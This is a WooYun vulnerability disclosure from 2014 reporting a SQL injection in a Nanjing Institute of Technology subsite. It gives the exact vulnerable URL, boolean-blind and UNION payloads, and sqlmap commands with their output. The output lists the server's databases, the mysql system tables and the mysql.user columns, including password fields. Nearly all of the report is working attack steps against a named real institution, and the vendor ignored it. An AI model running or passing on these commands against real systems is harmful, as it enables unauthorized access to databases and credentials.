当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-062867
漏洞标题:
南京工程学院某分站#伪静态 Injection
相关厂商:
南京工程学院
漏洞作者:
从容
提交时间:
2014-06-05 10:41
修复时间:
2014-06-10 10:42
公开时间:
2014-06-10 10:42
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
8
漏洞状态:
已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-06-05: 细节已通知厂商并且等待厂商处理中
2014-06-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

南京工程学院某分站#伪静态 Injection

详细说明:

伪静态 Injection地址:

http://dlx.njit.edu.cn/index.php/Article/page/id/198.shtml


---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://dlx.njit.edu.cn:80/index.php/Article/page/id/198 AND 1397=1397.shtml
    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: http://dlx.njit.edu.cn:80/index.php/Article/page/id/-6579 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6f6271,0x5161594c7175426d4c58,0x71676b6671),NULL,NULL,NULL#.shtml
---

漏洞证明:

#1、获取数据库:

sqlmap -u http://dlx.njit.edu.cn/index.php/Article/page/id/198*.shtml --dbs


available databases [12]:                                                      
[*] bysj
[*] bysj2
[*] bysj_back
[*] bysjback
[*] dlx
[*] dlxy
[*] dqgcsjzx
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] texiaoku


#2、获取表段:

sqlmap -u http://dlx.njit.edu.cn/index.php/Article/page/id/198*.shtml -D mysql --tables


Database: mysql                                                                
[24 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+


#3、获取字段:

sqlmap -u http://dlx.njit.edu.cn/index.php/Article/page/id/198*.shtml -D mysql -T user --columns


Database: mysql                                                                
Table: user
[42 columns]
+------------------------+-----------------------------------+
| Column                 | Type                              |
+------------------------+-----------------------------------+
| User                   | char(16)                          |
| Alter_priv             | enum('N','Y')                     |
| Alter_routine_priv     | enum('N','Y')                     |
| authentication_string  | text                              |
| Create_priv            | enum('N','Y')                     |
| Create_routine_priv    | enum('N','Y')                     |
| Create_tablespace_priv | enum('N','Y')                     |
| Create_tmp_table_priv  | enum('N','Y')                     |
| Create_user_priv       | enum('N','Y')                     |
| Create_view_priv       | enum('N','Y')                     |
| Delete_priv            | enum('N','Y')                     |
| Drop_priv              | enum('N','Y')                     |
| Event_priv             | enum('N','Y')                     |
| Execute_priv           | enum('N','Y')                     |
| File_priv              | enum('N','Y')                     |
| Grant_priv             | enum('N','Y')                     |
| Host                   | char(60)                          |
| Index_priv             | enum('N','Y')                     |
| Insert_priv            | enum('N','Y')                     |
| Lock_tables_priv       | enum('N','Y')                     |
| max_connections        | int(11) unsigned                  |
| max_questions          | int(11) unsigned                  |
| max_updates            | int(11) unsigned                  |
| max_user_connections   | int(11) unsigned                  |
| Password               | char(41)                          |
| plugin                 | char(64)                          |
| Process_priv           | enum('N','Y')                     |
| References_priv        | enum('N','Y')                     |
| Reload_priv            | enum('N','Y')                     |
| Repl_client_priv       | enum('N','Y')                     |
| Repl_slave_priv        | enum('N','Y')                     |
| Select_priv            | enum('N','Y')                     |
| Show_db_priv           | enum('N','Y')                     |
| Show_view_priv         | enum('N','Y')                     |
| Shutdown_priv          | enum('N','Y')                     |
| ssl_cipher             | blob                              |
| ssl_type               | enum('','ANY','X509','SPECIFIED') |
| Super_priv             | enum('N','Y')                     |
| Trigger_priv           | enum('N','Y')                     |
| Update_priv            | enum('N','Y')                     |
| x509_issuer            | blob                              |
| x509_subject           | blob                              |
+------------------------+-----------------------------------+

修复方案:

:)

版权声明:转载请注明来源 从容@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-10 10:42

厂商回复:

最新状态:

暂无